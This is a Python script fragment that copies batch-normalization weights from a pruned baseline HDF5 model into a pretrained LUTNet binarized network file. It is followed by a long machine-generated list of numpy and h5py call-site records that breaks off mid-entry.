bl_moving_mean = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_1"]["batch_normalization_1"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 2 bl_beta = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_2"]["batch_normalization_2"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] 
= np.array(bl_moving_variance) # bn 3 bl_beta = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_3"]["batch_normalization_3"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 4 bl_beta = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_4"]["batch_normalization_4"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) # bn 5 bl_beta = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] bl_gamma = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] bl_moving_mean = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] bl_moving_variance = bl["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["beta:0"] p_gamma = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["gamma:0"] p_moving_mean = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_mean:0"] p_moving_variance = pretrained["model_weights"]["batch_normalization_5"]["batch_normalization_5"]["moving_variance:0"] p_beta[...] = np.array(bl_beta) p_gamma[...] = np.array(bl_gamma) p_moving_mean[...] = np.array(bl_moving_mean) p_moving_variance[...] = np.array(bl_moving_variance) pretrained.close()
[((3, 0, 3, 37), 'numpy.set_printoptions', 'np.set_printoptions', (), '', True, 'import numpy as np\n'), ((7, 0, 7, 48), 'shutil.copyfile', 'copyfile', ({(7, 9, 7, 26): '"""dummy_lutnet.h5"""', (7, 28, 7, 47): '"""pretrained_bin.h5"""'}, {}), "('dummy_lutnet.h5', 'pretrained_bin.h5')", False, 'from shutil import copyfile\n'), ((9, 5, 9, 41), 'h5py.File', 'h5py.File', ({(9, 15, 9, 35): '"""baseline_pruned.h5"""', (9, 37, 9, 40): '"""r"""'}, {}), "('baseline_pruned.h5', 'r')", False, 'import h5py\n'), ((11, 13, 11, 49), 'h5py.File', 'h5py.File', ({(11, 23, 11, 42): '"""pretrained_bin.h5"""', (11, 44, 11, 48): '"""r+"""'}, {}), "('pretrained_bin.h5', 'r+')", False, 'import h5py\n'), ((23, 15, 23, 30), 'numpy.array', 'np.array', ({(23, 24, 23, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((24, 15, 24, 33), 'numpy.array', 'np.array', ({(24, 24, 24, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((25, 25, 25, 50), 'numpy.array', 'np.array', ({(25, 34, 25, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((81, 15, 81, 30), 'numpy.shape', 'np.shape', ({(81, 24, 81, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((82, 13, 82, 30), 'numpy.shape', 'np.shape', ({(82, 22, 82, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((83, 12, 83, 32), 'numpy.zeros', 'np.zeros', ({(83, 21, 83, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((84, 11, 84, 30), 'numpy.ones', 'np.ones', ({(84, 19, 84, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((88, 15, 88, 30), 'numpy.array', 'np.array', ({(88, 24, 88, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((89, 8, 89, 23), 'numpy.array', 'np.array', ({(89, 17, 89, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((91, 13, 91, 37), 'numpy.arange', 'np.arange', ({(91, 23, 91, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((92, 0, 92, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(92, 18, 92, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((93, 13, 93, 37), 'numpy.arange', 'np.arange', ({(93, 23, 93, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((94, 0, 94, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(94, 18, 94, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((95, 13, 95, 37), 'numpy.arange', 'np.arange', ({(95, 23, 95, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((96, 0, 96, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(96, 18, 96, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((99, 12, 99, 52), 'numpy.logical_not', 'np.logical_not', ({(99, 27, 99, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((101, 15, 101, 64), 'numpy.logical_or', 'np.logical_or', ({(101, 29, 101, 41): 'pruning_mask', (101, 43, 101, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((102, 12, 102, 45), 'numpy.reshape', 'np.reshape', ({(102, 23, 102, 32): 'init_mask', (102, 34, 102, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((106, 20, 106, 71), 'numpy.tile', 'np.tile', ({(106, 28, 106, 38): 'rand_map_0', (106, 39, 106, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((107, 20, 107, 71), 'numpy.tile', 
'np.tile', ({(107, 28, 107, 38): 'rand_map_1', (107, 39, 107, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((108, 20, 108, 71), 'numpy.tile', 'np.tile', ({(108, 28, 108, 38): 'rand_map_2', (108, 39, 108, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((115, 15, 115, 53), 'numpy.reshape', 'np.reshape', ({(115, 26, 115, 38): 'bl_w1_rand_0', (115, 40, 115, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((190, 15, 190, 33), 'numpy.array', 'np.array', ({(190, 24, 190, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((191, 18, 191, 36), 'numpy.array', 'np.array', ({(191, 27, 191, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((192, 25, 192, 50), 'numpy.array', 'np.array', ({(192, 34, 192, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((255, 15, 255, 30), 'numpy.shape', 'np.shape', ({(255, 24, 255, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((256, 13, 256, 30), 'numpy.shape', 'np.shape', ({(256, 22, 256, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((257, 12, 257, 32), 'numpy.zeros', 'np.zeros', ({(257, 21, 257, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((258, 11, 258, 30), 'numpy.ones', 'np.ones', ({(258, 19, 258, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((262, 15, 262, 30), 'numpy.array', 'np.array', ({(262, 24, 262, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((263, 8, 263, 23), 'numpy.array', 'np.array', ({(263, 17, 263, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((265, 13, 265, 37), 'numpy.arange', 'np.arange', ({(265, 23, 265, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((266, 0, 266, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(266, 18, 266, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((267, 13, 267, 37), 'numpy.arange', 'np.arange', ({(267, 23, 267, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((268, 0, 268, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(268, 18, 268, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((269, 13, 269, 37), 'numpy.arange', 'np.arange', ({(269, 23, 269, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((270, 0, 270, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(270, 18, 270, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((273, 12, 273, 52), 'numpy.logical_not', 'np.logical_not', ({(273, 27, 273, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((275, 15, 275, 64), 'numpy.logical_or', 'np.logical_or', ({(275, 29, 275, 41): 'pruning_mask', (275, 43, 275, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((276, 12, 276, 45), 'numpy.reshape', 'np.reshape', ({(276, 23, 276, 32): 'init_mask', (276, 34, 276, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((280, 20, 280, 71), 'numpy.tile', 'np.tile', ({(280, 28, 280, 38): 'rand_map_0', (280, 39, 280, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((281, 20, 281, 71), 'numpy.tile', 
'np.tile', ({(281, 28, 281, 38): 'rand_map_1', (281, 39, 281, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((282, 20, 282, 71), 'numpy.tile', 'np.tile', ({(282, 28, 282, 38): 'rand_map_2', (282, 39, 282, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((289, 15, 289, 53), 'numpy.reshape', 'np.reshape', ({(289, 26, 289, 38): 'bl_w1_rand_0', (289, 40, 289, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((364, 15, 364, 33), 'numpy.array', 'np.array', ({(364, 24, 364, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((365, 18, 365, 36), 'numpy.array', 'np.array', ({(365, 27, 365, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((366, 25, 366, 50), 'numpy.array', 'np.array', ({(366, 34, 366, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((429, 15, 429, 30), 'numpy.shape', 'np.shape', ({(429, 24, 429, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((430, 13, 430, 30), 'numpy.shape', 'np.shape', ({(430, 22, 430, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((431, 12, 431, 32), 'numpy.zeros', 'np.zeros', ({(431, 21, 431, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((432, 11, 432, 30), 'numpy.ones', 'np.ones', ({(432, 19, 432, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((436, 15, 436, 30), 'numpy.array', 'np.array', ({(436, 24, 436, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((437, 8, 437, 23), 'numpy.array', 'np.array', ({(437, 17, 437, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((439, 13, 439, 37), 'numpy.arange', 'np.arange', ({(439, 23, 439, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((440, 0, 440, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(440, 18, 440, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((441, 13, 441, 37), 'numpy.arange', 'np.arange', ({(441, 23, 441, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((442, 0, 442, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(442, 18, 442, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((443, 13, 443, 37), 'numpy.arange', 'np.arange', ({(443, 23, 443, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((444, 0, 444, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(444, 18, 444, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((447, 12, 447, 52), 'numpy.logical_not', 'np.logical_not', ({(447, 27, 447, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((449, 15, 449, 64), 'numpy.logical_or', 'np.logical_or', ({(449, 29, 449, 41): 'pruning_mask', (449, 43, 449, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((450, 12, 450, 45), 'numpy.reshape', 'np.reshape', ({(450, 23, 450, 32): 'init_mask', (450, 34, 450, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((454, 20, 454, 71), 'numpy.tile', 'np.tile', ({(454, 28, 454, 38): 'rand_map_0', (454, 39, 454, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((455, 20, 455, 71), 'numpy.tile', 
'np.tile', ({(455, 28, 455, 38): 'rand_map_1', (455, 39, 455, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((456, 20, 456, 71), 'numpy.tile', 'np.tile', ({(456, 28, 456, 38): 'rand_map_2', (456, 39, 456, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((463, 15, 463, 53), 'numpy.reshape', 'np.reshape', ({(463, 26, 463, 38): 'bl_w1_rand_0', (463, 40, 463, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((538, 15, 538, 33), 'numpy.array', 'np.array', ({(538, 24, 538, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((539, 18, 539, 36), 'numpy.array', 'np.array', ({(539, 27, 539, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((540, 25, 540, 50), 'numpy.array', 'np.array', ({(540, 34, 540, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((603, 15, 603, 30), 'numpy.shape', 'np.shape', ({(603, 24, 603, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((604, 13, 604, 30), 'numpy.shape', 'np.shape', ({(604, 22, 604, 29): 'pret_c1'}, {}), '(pret_c1)', True, 'import numpy as np\n'), ((605, 12, 605, 32), 'numpy.zeros', 'np.zeros', ({(605, 21, 605, 31): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((606, 11, 606, 30), 'numpy.ones', 'np.ones', ({(606, 19, 606, 29): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((610, 15, 610, 30), 'numpy.array', 'np.array', ({(610, 24, 610, 29): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((611, 8, 611, 23), 'numpy.array', 'np.array', ({(611, 17, 611, 22): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((613, 13, 613, 37), 'numpy.arange', 'np.arange', ({(613, 23, 613, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((614, 0, 614, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(614, 18, 614, 28): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((615, 13, 615, 37), 'numpy.arange', 'np.arange', ({(615, 23, 615, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((616, 0, 616, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(616, 18, 616, 28): 'rand_map_1'}, {}), '(rand_map_1)', True, 'import numpy as np\n'), ((617, 13, 617, 37), 'numpy.arange', 'np.arange', ({(617, 23, 617, 36): 'tile_shape[0]'}, {}), '(tile_shape[0])', True, 'import numpy as np\n'), ((618, 0, 618, 29), 'numpy.random.shuffle', 'np.random.shuffle', ({(618, 18, 618, 28): 'rand_map_2'}, {}), '(rand_map_2)', True, 'import numpy as np\n'), ((621, 12, 621, 52), 'numpy.logical_not', 'np.logical_not', ({(621, 27, 621, 51): 'pruning_mask[rand_map_0]'}, {}), '(pruning_mask[rand_map_0])', True, 'import numpy as np\n'), ((623, 15, 623, 64), 'numpy.logical_or', 'np.logical_or', ({(623, 29, 623, 41): 'pruning_mask', (623, 43, 623, 63): 'pruning_mask_recover'}, {}), '(pruning_mask, pruning_mask_recover)', True, 'import numpy as np\n'), ((624, 12, 624, 45), 'numpy.reshape', 'np.reshape', ({(624, 23, 624, 32): 'init_mask', (624, 34, 624, 44): 'tile_shape'}, {}), '(init_mask, tile_shape)', True, 'import numpy as np\n'), ((628, 20, 628, 71), 'numpy.tile', 'np.tile', ({(628, 28, 628, 38): 'rand_map_0', (628, 39, 628, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_0, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((629, 20, 629, 71), 'numpy.tile', 
'np.tile', ({(629, 28, 629, 38): 'rand_map_1', (629, 39, 629, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_1, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((630, 20, 630, 71), 'numpy.tile', 'np.tile', ({(630, 28, 630, 38): 'rand_map_2', (630, 39, 630, 70): '[weight_shape[0] / tile_shape[0]]'}, {}), '(rand_map_2, [weight_shape[0] / tile_shape[0]])', True, 'import numpy as np\n'), ((637, 15, 637, 53), 'numpy.reshape', 'np.reshape', ({(637, 26, 637, 38): 'bl_w1_rand_0', (637, 40, 637, 52): 'weight_shape'}, {}), '(bl_w1_rand_0, weight_shape)', True, 'import numpy as np\n'), ((712, 15, 712, 33), 'numpy.array', 'np.array', ({(712, 24, 712, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((713, 18, 713, 36), 'numpy.array', 'np.array', ({(713, 27, 713, 35): 'bl_means'}, {}), '(bl_means)', True, 'import numpy as np\n'), ((714, 25, 714, 50), 'numpy.array', 'np.array', ({(714, 34, 714, 49): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((737, 14, 737, 31), 'numpy.array', 'np.array', ({(737, 23, 737, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((738, 15, 738, 33), 'numpy.array', 'np.array', ({(738, 24, 738, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((739, 21, 739, 45), 'numpy.array', 'np.array', ({(739, 30, 739, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((740, 25, 740, 53), 'numpy.array', 'np.array', ({(740, 34, 740, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((753, 14, 753, 31), 'numpy.array', 'np.array', ({(753, 23, 753, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((754, 15, 754, 33), 'numpy.array', 'np.array', ({(754, 24, 754, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((755, 21, 755, 45), 'numpy.array', 'np.array', ({(755, 30, 755, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((756, 25, 756, 53), 'numpy.array', 'np.array', ({(756, 34, 756, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((769, 14, 769, 31), 'numpy.array', 'np.array', ({(769, 23, 769, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((770, 15, 770, 33), 'numpy.array', 'np.array', ({(770, 24, 770, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((771, 21, 771, 45), 'numpy.array', 'np.array', ({(771, 30, 771, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((772, 25, 772, 53), 'numpy.array', 'np.array', ({(772, 34, 772, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((785, 14, 785, 31), 'numpy.array', 'np.array', ({(785, 23, 785, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((786, 15, 786, 33), 'numpy.array', 'np.array', ({(786, 24, 786, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((787, 21, 787, 45), 'numpy.array', 'np.array', ({(787, 30, 787, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((788, 25, 788, 53), 'numpy.array', 'np.array', ({(788, 34, 788, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((801, 14, 801, 31), 'numpy.array', 'np.array', ({(801, 23, 801, 30): 'bl_beta'}, {}), '(bl_beta)', True, 'import numpy as np\n'), ((802, 15, 802, 33), 'numpy.array', 'np.array', ({(802, 24, 802, 32): 'bl_gamma'}, {}), '(bl_gamma)', True, 'import numpy as np\n'), ((803, 21, 803, 
45), 'numpy.array', 'np.array', ({(803, 30, 803, 44): 'bl_moving_mean'}, {}), '(bl_moving_mean)', True, 'import numpy as np\n'), ((804, 25, 804, 53), 'numpy.array', 'np.array', ({(804, 34, 804, 52): 'bl_moving_variance'}, {}), '(bl_moving_variance)', True, 'import numpy as np\n'), ((85, 16, 85, 35), 'numpy.ones', 'np.ones', ({(85, 24, 85, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((100, 23, 100, 62), 'numpy.logical_and', 'np.logical_and', ({(100, 38, 100, 50): 'pruning_mask', (100, 52, 100, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((259, 16, 259, 35), 'numpy.ones', 'np.ones', ({(259, 24, 259, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((274, 23, 274, 62), 'numpy.logical_and', 'np.logical_and', ({(274, 38, 274, 50): 'pruning_mask', (274, 52, 274, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((433, 16, 433, 35), 'numpy.ones', 'np.ones', ({(433, 24, 433, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((448, 23, 448, 62), 'numpy.logical_and', 'np.logical_and', ({(448, 38, 448, 50): 'pruning_mask', (448, 52, 448, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((607, 16, 607, 35), 'numpy.ones', 'np.ones', ({(607, 24, 607, 34): 'tile_shape'}, {}), '(tile_shape)', True, 'import numpy as np\n'), ((622, 23, 622, 62), 'numpy.logical_and', 'np.logical_and', ({(622, 38, 622, 50): 'pruning_mask', (622, 52, 622, 61): 'init_mask'}, {}), '(pruning_mask, init_mask)', True, 'import numpy as np\n'), ((18, 30, 18, 45), 'numpy.array', 'np.array', ({(18, 39, 18, 44): 'bl_w1'}, {}), '(bl_w1)', True, 'import numpy as np\n'), ((27, 13, 27, 38), 'numpy.array', 'np.array', ({(27, 22, 27, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((98, 15, 98, 40), 'numpy.array', 'np.array', ({(98, 24, 98, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((100, 63, 100, 85), 'numpy.argsort', 'np.argsort', ({(100, 74, 100, 84): 'rand_map_0'}, {}), '(rand_map_0)', True, 'import numpy as np\n'), ((187, 23, 187, 53), 'numpy.reshape', 'np.reshape', ({(187, 34, 187, 44): 'rand_map_0', (187, 46, 187, 52): '(-1, 1)'}, {}), '(rand_map_0, (-1, 1))', True, 'import numpy as np\n'), ((188, 23, 188, 53), 'numpy.reshape', 'np.reshape', ({(188, 34, 188, 44): 'rand_map_1', (188, 46, 188, 52): '(-1, 1)'}, {}), '(rand_map_1, (-1, 1))', True, 'import numpy as np\n'), ((189, 23, 189, 53), 'numpy.reshape', 'np.reshape', ({(189, 34, 189, 44): 'rand_map_2', (189, 46, 189, 52): '(-1, 1)'}, {}), '(rand_map_2, (-1, 1))', True, 'import numpy as np\n'), ((194, 20, 194, 57), 'numpy.reshape', 'np.reshape', ({(194, 31, 194, 48): 'rand_map_0_expand', (194, 50, 194, 56): '[-1, 1]'}, {}), '(rand_map_0_expand, [-1, 1])', True, 'import numpy as np\n'), ((196, 20, 196, 57), 'numpy.reshape', 'np.reshape', ({(196, 31, 196, 48): 'rand_map_1_expand', (196, 50, 196, 56): '[-1, 1]'}, {}), '(rand_map_1_expand, [-1, 1])', True, 'import numpy as np\n'), ((198, 20, 198, 57), 'numpy.reshape', 'np.reshape', ({(198, 31, 198, 48): 'rand_map_2_expand', (198, 50, 198, 56): '[-1, 1]'}, {}), '(rand_map_2_expand, [-1, 1])', True, 'import numpy as np\n'), ((201, 13, 201, 38), 'numpy.array', 'np.array', ({(201, 22, 201, 37): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 'import numpy as np\n'), ((272, 15, 272, 40), 'numpy.array', 'np.array', ({(272, 24, 272, 39): 'bl_pruning_mask'}, {}), '(bl_pruning_mask)', True, 
